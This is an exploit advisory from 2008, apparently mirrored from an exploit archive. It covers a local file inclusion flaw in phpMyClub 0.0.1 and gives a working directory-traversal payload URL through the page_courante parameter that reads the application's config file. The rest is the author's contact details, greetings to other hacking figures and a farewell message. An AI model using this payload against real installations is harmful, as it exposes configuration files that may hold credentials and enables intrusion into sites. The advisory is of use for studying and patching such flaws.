phpMyClub 0.0.1 (page_courante) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpMyClub 0.0.1 (page_courante) Local File Inclusion Vulnerability
# Published : 2008-01-28
# Author : S.W.A.T.
# Previous Title : Mambo Component MaMML (listid) Remote SQL Injection Vulnerability
# Next Title : bubbling library 1.32 dispatcher.php Remote File Disclosure Vulnerabilities

## phpMyClub Local File Inclusion Vulnerability  

## Download script :
http://ovh.dl.sourceforge.net/sourceforge/phpmyclub/phpMyClub-0.0.1.zip

## Author : S.W.A.T.

## E-Mail : svvateam@yahoo.com - swat@svvat.ir

## Home : http://svvat.ir

## For Execute Exploit Does Not Write Extention Of
File

## example : [script]/?page_courante=../config/config

## exploit :

## http://localhost/[script]/?page_courante=../[name of file without .php]
##
http://localhost/[script]/?page_courante=../config/config

## Greetz:

## Xmors Digital Security Team - Str0ke - Dj7xpl - DarKLiFe - NazNazi

## In Portland Now - Maybe I Can't See IRAN Anyway (
This Is Really Bye NET  :(  For Ever )

  
#########################################################################
   #								           #
   #   BYE ALL MY FRIENDS OVER THE NET & EVERYTHING ON THE NET             #
   #								           #
   #########################################################################


# www.Syue.com [2008-01-28]